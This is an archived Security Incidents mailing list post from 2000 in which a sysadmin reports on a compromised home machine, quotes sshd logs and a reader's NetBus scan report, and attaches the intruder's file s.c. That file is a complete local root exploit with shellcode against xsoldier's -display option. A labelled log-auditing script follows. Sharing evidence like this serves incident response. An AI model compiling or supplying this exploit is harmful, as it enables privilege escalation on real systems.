Security Incidents mailing list archives

hacked @home **update**


From: nmorgowicz () RALCOIND COM (Nick Morgowicz)
Date: Thu, 8 Jun 2000 15:51:14 -0400


 <<s.c>>
I'm not sure if this mailing list can do attachments, so I've attached the
file, and at the bottom of the e-mail message is the source as well.  At 8pm
last evening, about 6 hours after I booted this guy off my box, he tried to
ssh in with the compromised username, since I turned off telnet and turned
on my gShield firewall.  He was unsuccessful. :)

Jun  7 20:04:50 localhost sshd[28087]: Did not receive ident string from 147.91.1.113.
Jun  7 20:05:06 localhost PAM_pwdb[28088]: authentication failure; (uid=0) -> public for sshd service
Jun  7 20:05:06 localhost sshd[28088]: Failed password for public from 147.91.1.113 port 13541
Jun  7 20:05:07 localhost sshd[28088]: Connection closed by 147.91.1.113

Jun  7 20:06:12 localhost PAM_pwdb[28091]: authentication failure; (uid=0) -> public for sshd service
Jun  7 20:06:12 localhost sshd[28091]: Failed password for public from 133.34.45.222 port 1023
Jun  7 20:06:13 localhost sshd[28091]: Connection closed by 133.34.45.222
Jun  7 20:06:13 localhost PAM_pwdb[28091]: (sshd) session closed for user public

A few people asked me if I was running a vulnerable version of bind, and if
he used the ADMROCKS exploit, and no, I'm not.  I'm using 8.2.2P5 with the
version info masked out so script kiddies won't get tempted.  I contacted my
friend who originally owned the account, and he regretfully admitted to
having a stupid, easy to guess password.

One person on the list said that he picked up the .on.wave.home.com address
on a sniffer trace a few evenings ago, probably the same time that this guy
got on my box.  His words:

<clip>
the ...on.wave.home.com address... I have a sniffer trace of a
distributed scan coming from this network 2 nights ago ...
basically they were scanning for NetBus backdoors (i.e. source port
incremental, dest port 12345)...

Acting quickly I threw up a rude DTK and presented a false indication
of Netbus... within a short time period (15 min) I logged an attempt
to connect using Netbus... all attacks were unsuccessful...
</clip>

I'd like to thank everyone for such a quick response and for all your advice
and comments.  This is the first time that I've used this list and I'm very
impressed with the enthusiasm and help that everyone brought me. Thank you!
:)

Nick Morgowicz
Systems Administrator
Ralco Industries

-- source of s.c file --
#include <stdio.h>
#include <stdlib.h>
#include <string.h>             /* strlen, memcpy */
#include <unistd.h>             /* execl */

#define NOP 0x90                /* no operation, skip to next instruction. */
#define LEN 4480                /* our buffer size. */

char shellcode[] =              /* execve with setreuid(0,0) and no '/'
                                   hellkit v1.1 */
  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
  "\xc2\x91";

/* Nab the stack pointer to use as an index into our NOPs
   (x86 only: the value is left in %eax, which the caller reads as the
   return value). */
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i, offset;
  long retaddr = get_sp ();

  if (argc <= 1)
    offset = 0;
  else
    offset = atoi (argv[1]);

  /* Copy the NOPs into the buffer, leaving space for shellcode and
     pointers. */

  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;

  /* [NNNNNNNNNNNNNNNNNNNNN                            ] */
  /*                       ^-- LEN - strlen(shellcode) - 100 */
  /* Copy the shellcode into the buffer. */

  memcpy (buffer + i, shellcode, strlen (shellcode));

  /* [NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS            ] */
  /*                       ^-(buffer+i)                  */
  /* Fill the rest of the buffer with our new address to jump to: esp + offset. */

  for (i = i + strlen (shellcode); i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr + offset;

  /* [NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR] */
  /*                                       ^-(i+strlen(shellcode)) */

  printf ("Jumping to address %lx BufSize %d\n", retaddr + offset, LEN);
  execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, (char *) 0);

  return 0;
}
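The sshd/PAM_pwdb lines quoted at the top of the post are the kind of evidence worth watching for once an account is known to be compromised: failed (and especially accepted) logins for that username from any address. The following audit script is an added example, not part of the original post or the s.c attachment; the log lines it parses are constructed to match the format shown above, the usernames and addresses are assumptions, and the `sshd[pid]: Failed/Accepted password for USER from IP port N` and `Did not receive ident string from IP.` patterns are the formats visible in the post.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the sshd / PAM_pwdb entries quoted in the post
# (the 10.0.0.5 / "nick" line is an added, assumed legitimate login for contrast).
SAMPLE_LOG = """\
Jun  7 20:04:50 localhost sshd[28087]: Did not receive ident string from 147.91.1.113.
Jun  7 20:05:06 localhost PAM_pwdb[28088]: authentication failure; (uid=0) -> public for sshd service
Jun  7 20:05:06 localhost sshd[28088]: Failed password for public from 147.91.1.113 port 13541
Jun  7 20:05:07 localhost sshd[28088]: Connection closed by 147.91.1.113
Jun  7 20:06:12 localhost sshd[28091]: Failed password for public from 133.34.45.222 port 1023
Jun  7 20:06:13 localhost sshd[28091]: Connection closed by 133.34.45.222
Jun  7 21:10:02 localhost sshd[28120]: Accepted password for nick from 10.0.0.5 port 1022
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port \d+")
# The old sshd logs the peer address with a trailing period on this message.
NO_IDENT = re.compile(r"sshd\[\d+\]: Did not receive ident string from (\S+?)\.?$")


def audit_ssh_log(lines, watched_users):
    """Summarise sshd activity per source address and raise alerts for watched accounts.

    watched_users: usernames known to be compromised (here: "public").
    Returns (per_ip_report, alerts); alerts are (kind, user, ip) tuples.
    """
    report = defaultdict(lambda: {"failed": 0, "accepted": 0, "no_ident": 0, "users": set()})
    alerts = []
    for line in lines:
        line = line.rstrip()
        if m := FAILED.search(line):
            user, ip = m.groups()
            report[ip]["failed"] += 1
            report[ip]["users"].add(user)
            if user in watched_users:
                alerts.append(("failed-watched-user", user, ip))
        elif m := ACCEPTED.search(line):
            user, ip = m.groups()
            report[ip]["accepted"] += 1
            report[ip]["users"].add(user)
            if user in watched_users:  # password still works: the account was not locked
                alerts.append(("ACCEPTED-watched-user", user, ip))
        elif m := NO_IDENT.search(line):
            # No client banner: typical of a scanner or a connect-and-drop probe, not a real session.
            report[m.group(1)]["no_ident"] += 1
    return dict(report), alerts


if __name__ == "__main__":
    per_ip, alerts = audit_ssh_log(SAMPLE_LOG.splitlines(), {"public"})
    for kind, user, ip in alerts:
        print(f"{kind}: {user} from {ip} (failed={per_ip[ip]['failed']}, no_ident={per_ip[ip]['no_ident']})")
```

Feed it `/var/log/messages` (or wherever sshd logs) and the list of accounts from the incident; any `ACCEPTED-watched-user` alert means the compromised password has not yet been changed or the account disabled.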


